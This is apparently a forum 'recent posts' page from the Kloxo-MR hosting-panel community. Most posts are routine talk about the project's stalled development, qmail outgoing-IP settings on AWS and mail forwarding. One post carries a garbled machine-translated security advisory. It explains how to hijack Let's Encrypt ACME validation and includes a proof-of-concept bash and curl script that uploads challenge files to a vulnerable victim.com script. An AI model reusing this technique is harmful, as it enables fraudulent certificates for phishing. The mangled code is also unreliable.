Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2018-08-15, 04:55:04

Recent Posts

Pages: 1 2 [3] 4 5 ... 10
21
Kloxo-MR Technical Helps / Re: The future of Kloxo-MR
« Last post by LotsOfQ on 2018-06-12, 07:13:09 »
I have been patiently waiting but it doesn't look good from here. I am moving on.
22
Forum Announcements / Re: MR will be back
« Last post by LotsOfQ on 2018-06-12, 07:11:07 »
It looks like it's time to move on for me. Good luck everyone.
23
Hope this helps.

I've been having similar issues with AWS EC2 instances .

I was able to resolve the problem by editing /var/qmail/control/outgoingips to change the Public IP address (Elastic IP) to the Private IP address.

Then when qmail sends from the Private IP, it gets translated back to the Public IP.

Now looking for a way to set outgoingips without have to manually edit the file. 

Update: I've just noticed that you can set the file  /usr/local/lxlabs/kloxo/etc/flag/manualoutgoingips.flg to flag an override on the auto updating of outgoingips.


my ip's got switched again to the external ip, instead of internal.   this method requires copying the state of outgoingips, and replicating it in this .flg file, however what happens when more domains are added., any way to make all domains get the internal address always on this file?
24
Beberapa kali saya merasakan ada yang aneh dengan SSL Jenis Let's Encrypt, domain yang dipasang Let's Encrypt ini tiba-tiba meredirek ke alamat ip dan membuat heboh.

Bagimana ini bisa terjadi ?

Berdasarkan hasil penelusuran menyatakan bahwa Let's Encrypt ini berbahaya, ada indikasi attacker executes pada domain.tld kerena pengunjung sudah menyimpan auto redirek pada domain ke SLL, maka hanya tinggal menunggu waktu untuk meng Exploit domainnya.

Bagaimana cara mengebalikan atau memulihkan kembali domain yang sudah terpasang SSL menjadi non SSL dan menghapus  sertifikat di seluruh pengujung agar tidak menggunakan jalur SSL?
25
1. Ikhtisar

Let's Encrypt dapat diakali dengan mengeluarkan sertifikat SSL ke remote
penyerang dengan membajak tantangan ACME melalui eksploitasi jarak jauh yang mungkin
ada di situs web korban.


2. Detail

The Let's Encrypt Certificate Authority dapat disalahgunakan untuk mengeluarkan SSL
sertifikat untuk penyerang, dengan memanfaatkan berbagai remote
teknik eksploitasi yang membajak rutinitas validasi tantangan ACME.
Dalam setiap skenario yang disajikan, sertifikat diminta dan diberikan pada a
mesin remote dikendalikan oleh penyerang. Mari Enkripsi utilitas (seperti
certbot) tidak perlu dipasang di server yang menghosting situs web korban.

Beberapa skenario serangan disajikan:
1) Memanfaatkan kerentanan pengunggahan file tak terbatas di situs web korban
2) Memanfaatkan izin miskin dalam lingkungan hosting bersama
3) Memanfaatkan serangan Man In the Middle (MITM) untuk mengubah lalu lintas jaringan
4) Memanfaatkan proxy berbahaya untuk mengubah lalu lintas HTTP

Setiap skenario membutuhkan kerentanan jarak jauh untuk ada di situs web korban
atau lingkungan yang dihosting; namun, dengan menambahkan pengamanan tambahan, Let's Encrypt
dapat mencegah sertifikat palsu dikeluarkan untuk penyerang.


3. Dampak

Penyerang yang mendapatkan sertifikat SSL yang valid untuk situs web korban dapat menggunakannya
kepada pengunjung situs web phishing.

Jika penyerang dapat: 1) menipu pengunjung agar menggunakan server DNS berbahaya
atau 2) menggunakan serangan tingkat jaringan seperti keracunan ARP cache untuk mengalihkan DNS
permintaan ke server web palsu, pengunjung akan dikirim ke kloning
situs web, menggunakan nama domain yang sama, dengan sertifikat SSL yang valid, memaksimalkan
keberhasilan kampanye phishing.


4. Eksploitasi

Eksploitasi untuk skenario pengunggahan file tidak terbatas disediakan, dan
menunjukkan bagaimana validasi tantangan ACME dapat dibajak. Yang lain
Skenario serangan dijelaskan dalam istilah teoritis dan diyakini
dieksploitasi karena masing-masing membajak validasi tantangan ACME.


4a. Exploit - Proof of Concept (Pengunggahan File Tidak Terbatas)

Dalam skenario berikut ini, kami menemukan situs web korban yang mencakup
kerentanan jarak jauh, yang memungkinkan pengunggahan file tanpa batas dan nyaman
(dan tidak realistis) memindahkan file langsung ke .well-known / acme-challenge
direktori. Meskipun skenario ini kemungkinan tidak akan pernah terjadi, ini menunjukkan hal itu
tantangan ACME dapat dihasilkan pada mesin jarak jauh dan untuk sementara ditempatkan
situs web korban untuk memvalidasi tantangan. Sertifikat ini kemudian diterbitkan
mesin penyerang.

    # Script Rentan: http://victim.com/le-receive.php
    # Remote penyerang menggunakan skrip berikut: lt-waitsend.sh

    #! / bin / bash

    FAKEWEBROOT = / tmp / fake / .well-known / acme-challenge

    # Terus periksa apakah certbot telah menghasilkan tantangan ACME
    # dan unggah ke korban segera setelah tersedia
    sampai [-f $ {FAKEWEBROOT} / *]
    melakukan
      tidur 0,1
    selesai
    lefile = `ls -1 $ {FAKEWEBROOT} / *`
    echo "Ditemukan $ {lefile}"
    curl -i -X ??POST -H "Content-Type: multipart / form-data"
        -F "data = @ $ {lefile}" http://victim.com/le-receive.php
    keluar


    # Remote penyerang mengeksekusi yang berikut:

    ~ $ ./lt-waitsend.sh
    ~ $ ./certbot-auto certonly --staging --no-self-upgrade
        --webroot -w / tmp / fake -d victim.com


4b. Exploit - Skenario Realistis (Pengunggahan File Tidak Terbatas)

Skenario yang lebih realistis disajikan di mana victim.com menyertakan skrip yang
memungkinkan pengunggahan file tidak terbatas dan webroot dimiliki oleh pengguna apache.

    # Script Rentan: http://victim.com/le-receive2.php:
    # Penyerang mengunggah skrip berikut (le-create.php) ke victim.com melalui
    # Kerentanan jarak jauh. Skrip akan menunggu tantangan ACME
    # Diunggah melalui kerentanan jarak jauh dan memindahkannya ke lokasi yang benar

    # Penyerang memanfaatkan skrip berikut untuk menghasilkan sertifikat dan
    # memindahkannya ke tempatnya: lt-waitsend.sh

    #! / bin / bash

    FAKEWEBROOT = / tmp / fake / .well-known / acme-challenge

    sampai [-f $ {FAKEWEBROOT} / *]
    melakukan
        tidur 0,1
    selesai
    lefile = `ls -1 $ {FAKEWEBROOT} / *`
    echo "Ditemukan $ {lefile}"
    curl -i -X ??POST -H "Content-Type: multipart / form-data"
        -F "data = @ $ {lefile}" http://victim.com/le-receive.php
    curl http://victim.com/temp/le-create.php
    keluar

    # Remote penyerang mengeksekusi yang berikut:
    ~ $ ./lt-waitsend.sh
    ~ $ ./certbot-auto certonly --staging --no-self-upgrade
         --webroot -w / tmp / fake -d victim.com

    # Pada titik ini penyerang dapat membersihkan file jauh untuk tidak meninggalkan jejak.


4c. Eksploitasi Diskusi

Eksploitasi di atas menunjukkan bahwa tantangan ACME dapat dihasilkan pada a
mesin penyerang jarak jauh dan ditransfer sementara ke mesin korban
melalui kerentanan jarak jauh, memungkinkan tantangan untuk divalidasi dan
mengeluarkan sertifikat kepada penyerang.

Demikian juga, lingkungan hosting bersama yang tidak dikonfigurasi dengan baik dapat menyajikan
masalah yang sama. Misalnya jika dua situs web di server yang sama keduanya memiliki webroots
dimiliki oleh apache: apac
26
Kloxo-MR Releases / Re: kloxo-mr 6.5.0 to 7.0.0
« Last post by azzureal on 2018-05-24, 17:10:14 »
In my case? Yes.
27
Forum Announcements / Re: MR will be back
« Last post by amitkumar on 2018-05-24, 16:21:34 »
He is giving time to family, so guys chill project is live and it will be live forever. Please Donate monthly for server and coder fees. This will be a big help to the project.

Every year I have donate it, but now sorry I don't buy it. "He is here please donate".
Sorry, but it just looks like you would like to take money in his name.

If Mustafa is here or alive he will reply in his style and word. For every support he gave he receive donation from ppl. For now it looks thah he isn't here or he isn't active on this project at all.

Currently, this project seems dead to me or not in progress.

I am not taking a single penny.

Here is the proof that the project is still live

https://github.com/mustafaramadhan/kloxo

a month ago  added a code for ngnix
28
Kloxo-MR Technical Helps / Forward mail to multiple addresses
« Last post by idove on 2018-05-24, 09:44:27 »
Anyone tested?

Is it possible to forward mail to multiple addresses, for example if i send mail to mail1@domain.com, to resend this email to mail2, mail3 and mail4 on the same domain.

And that all mail1, ... mail4 has the same email in inbox which was sent to mail1.
Please try before comment, it seems that this is impossible.

Thank you.
29
Forum Announcements / Re: MR will be back
« Last post by fossxplorer on 2018-05-20, 16:59:45 »
Sad, but true!
30
Kloxo-MR Releases / Re: kloxo-mr 6.5.0 to 7.0.0
« Last post by labpros on 2018-05-18, 14:42:30 »
thanks azzureal,
you mean everything will continue to work as it was before?
Pages: 1 2 [3] 4 5 ... 10

Top 4 Global Search Engines:    Google    Bing    Baidu    Yahoo
Click Here

Page created in 0.038 seconds with 13 queries.

web stats analysis